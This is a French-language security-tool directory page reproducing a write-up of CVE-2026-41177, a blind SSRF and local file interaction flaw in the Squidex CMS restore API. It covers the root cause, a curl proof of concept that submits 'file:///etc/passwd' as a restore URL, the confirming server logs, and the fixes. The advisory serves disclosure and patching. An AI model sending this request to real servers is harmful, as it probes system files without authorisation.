Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-41177-Squidex-CMS — CVE-2026-41177, une vulnérabilité SSRF aveugle dans Squidex CMS (avant la v7.23.0). Comprend une analyse de la cause racine, des étapes de reproduction et une évaluation de l'impact concernant l'interaction avec les fichiers locaux (LFI). | Kitploit
Outils/GitHubGitHub/turkios/cve-2026-41177-squidex-cms
Analyse des VulnérabilitésExploitationSécurité WebApprentissage et Éducation
GitHubturkios/cve-2026-41177-squidex-cms

CVE-2026-41177-Squidex-CMS

CVE-2026-41177, une vulnérabilité SSRF aveugle dans Squidex CMS (avant la v7.23.0). Comprend une analyse de la cause racine, des étapes de reproduction et une évaluation de l'impact concernant l'interaction avec les fichiers locaux (LFI).

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-41177 : SSRF aveugle dans Squidex CMS

Recherche technique et analyse pour CVE-2026-41177 : une vulnérabilité de Server-Side Request Forgery (SSRF) aveugle dans l'API de restauration de Squidex CMS.

Présentation de la vulnérabilité

  • Identifiant CVE : CVE-2026-41177
  • Composant concerné : API Squidex : moteur de sauvegarde / restauration (/api/apps/restore)
  • Versions concernées : < 7.23.0
  • Type de vulnérabilité : SSRF aveugle (CWE-918), interaction avec les fichiers locaux (CWE-73)

Résumé

L'API de restauration de Squidex est vulnérable à une Server-Side Request Forgery (SSRF) aveugle. L'application ne valide pas le schéma d'URI du paramètre Url fourni par l'utilisateur, ce qui permet l'utilisation du protocole file://. Cela permet à un administrateur authentifié de forcer le serveur backend à interagir avec le système de fichiers local, conduisant à une interaction avec les fichiers locaux (LFI) et à une divulgation potentielle d'informations système sensibles via une analyse par canal auxiliaire des journaux internes.

Détails

  1. Configuration : Un attaquant crée une tâche de « restauration » en utilisant un URI du système de fichiers local (par exemple, file:///etc/passwd).
  2. Déclenchement : L'attaquant soumet la requête POST au point de terminaison de restauration.
  3. Exécution : Le backend accepte la requête et transmet l'URL à un processus en arrière-plan (RestoreJob).
  4. Observation : Bien que la réponse de l'API soit un 204 No Content générique, les journaux internes du serveur révèlent que le serveur a ouvert et lu le fichier avec succès avant d'échouer, car le contenu n'était pas une archive ZIP valide.

Preuve de concept (PoC)

1. Requête malveillante

Exécutez la commande curl suivante (remplacez <TOKEN> par un jeton administrateur valide) :

root@kitploit:~
curl -X POST http://localhost/api/apps/restore/ \
  -H 'Authorization: Bearer <TOKEN>' \
  -H 'Content-Type: application/json' \
  -d '{
    "Url": "file:///etc/passwd",
    "Name": "exploit-poc"
  }' -v

2. Validation via les journaux

L'erreur suivante dans les journaux du conteneur Squidex confirme l'interaction interne avec le fichier :

root@kitploit:~
{
  "logLevel": "Error",
  "message": "Backup with job id 381bcfcb-3701-44d0-a8c8-ea43b3ec6271 from URL 'file:///etc/passwd' failed.",
  "exception": {
    "type": "System.IO.InvalidDataException",
    "message": "End of Central Directory record could not be found.",
    "stackTrace": "at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\n at System.IO.Compression.ZipArchive..ctor(Stream stream...)\n at Squidex.Domain.Apps.Entities.Backup.BackupReader..ctor(...) in BackupReader.cs:line 42\n at Squidex.Domain.Apps.Entities.Backup.TempFolderBackupArchiveLocation.OpenReaderAsync(...) in TempFolderBackupArchiveLocation.cs:line 57"
  }
}

Remarque : l'InvalidDataException confirme que le serveur a accédé avec succès aux octets du fichier et les a lus.

Impact

Cette vulnérabilité permet aux attaquants authentifiés de :

  • Reconnaissance du système de fichiers : Confirmer la présence de fichiers sensibles (par exemple, appsettings.json, secrets).
  • Divulgation d'informations : Dans les environnements multi-locataires, cela pourrait potentiellement être utilisé pour accéder aux fichiers de sauvegarde d'autres utilisateurs.

Correctifs

  • Mise à jour : Mettez à niveau vers Squidex version 7.23.0 ou ultérieure.
  • Liste blanche de protocoles : Autorisez strictement uniquement les schémas http:// et https://.
  • Validation des entrées : Implémentez une vérification pour rejeter tout URI utilisant le schéma file:// avant le traitement.
  • Gestion sûre des E/S : Assurez-vous que les gestionnaires sous-jacents sont restreints de la résolution du système de fichiers local pour les entrées fournies par l'utilisateur.

Références

  • Avis de sécurité GitHub (GHSA-45fq-w37p-qfw5)
  • Enregistrement CVE officiel
Télécharger l’outil